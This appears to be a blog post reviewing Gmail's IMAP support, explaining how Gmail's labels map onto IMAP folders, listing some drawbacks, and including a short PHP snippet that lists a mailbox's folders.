IMAP is geek speak for Internet Message Access Protocol. ….
… with IMAP any changes (sorting, deleting, reading, or otherwise) are reflected across all Gmail interfaces – be it using Outlook Express, your iPhone, or Web-based Gmail. For example if you create a folder and sort messages into it using your desktop Outlook Express client those changes show up on Web-based Gmail.

IMAP is a boon for people like me who check their email from multiple locations. So I decided to give IMAP support in Gmail a spin, and here's what I came up with:

For starters, Gmail has done a remarkable job of supporting IMAP. I can appreciate the technical difficulty of supporting IMAP on Gmail. Think about it: Gmail moved away from conventional folder-based email organization to offer what is essentially tag-based (label-based) organization of email (although their tagging interface is too cumbersome, in my opinion). Given that IMAP is a folder-based email access protocol, reconciling the two is not an easy task. But Google has done a good job of it this time around.

After you enable IMAP and configure your mail client, there are changes you will notice in the web-based Gmail interface.

  • All the folders that you create using your email client will now appear as labels in the web interface.
  • Certain labels, like Trash or Chats, are reserved by Gmail. If you try to create a folder by one of those names, the folder will appear as '[imap]/foldername'.
  • Any label of the form 'text1/text2' will now appear as a folder 'text2' nested inside a folder 'text1'. So if you have any labels of the form 'family/friend' or 'work/spam', consider renaming them without the '/' before enabling IMAP.

So how did tag-based Gmail reconcile with folder-based IMAP?

  • Each label appears as a separate folder in IMAP.
  • To apply multiple labels, just copy the email to multiple folders.
  • Moving an email from one folder to another changes the label on the email from the first label to the second.
  • If you move an email to a sub-folder 'sub' within a main folder 'main', it will show up in the web interface as being labeled 'main/sub'.
  • If you configure your mail client to send email using Gmail's SMTP server, a copy of every email is stored in the '[Gmail]/Sent Mail' folder.

Here is the set of IMAP actions and their corresponding web-based Gmail actions.

Spam, however, is handled differently. To mark a message as spam, move it to the '[Gmail]/Spam' folder in the IMAP interface. Simply marking the email as 'spam' in your mail client (like Thunderbird) will trigger the email client's spam filters, but not Gmail's.
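
To see the label-to-folder mapping for yourself outside a mail client, here is a minimal sketch using PHP's imap extension (assuming it is installed; the credentials are placeholders):

<?php
// Connect to Gmail over IMAP/SSL and list every folder. Each Gmail label
// shows up as a folder, alongside reserved ones like '[Gmail]/Sent Mail',
// '[Gmail]/Spam', and '[Gmail]/Trash'.
$server = '{imap.gmail.com:993/imap/ssl}';
$mbox = imap_open($server . 'INBOX', 'you@gmail.com', 'your-password');
if ($mbox === false) {
    die('IMAP connection failed: ' . imap_last_error());
}
$folders = imap_list($mbox, $server, '*');
if ($folders !== false) {
    foreach ($folders as $folder) {
        echo $folder . "\n";
    }
}
imap_close($mbox);
?>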

Drawbacks

  • The only major drawback is that IMAP's default trash folder is different from Gmail's Trash folder, and there's no easy way to fix this. The only fix that I found to work for Thunderbird is the one on Tech Samurai; it is not the most straightforward config change to make Thunderbird use Gmail's Trash folder.
  • The bigger issue with simulating a folder-based structure on top of a tag-based structure is the following:
    If an email has multiple tags (labels) associated with it, the email shows up in multiple folders on the IMAP client. 'Deleting' such an email involves deleting (or moving to [Gmail]/Trash) all the virtual copies of the email from all the folders where they reside. This can be an arduous task, especially if you do not know all the labels that were applied to the message to begin with (and you don't, if you are using the IMAP interface exclusively).

Overall, a really clean and neat implementation on Google's part. Good job, Google!
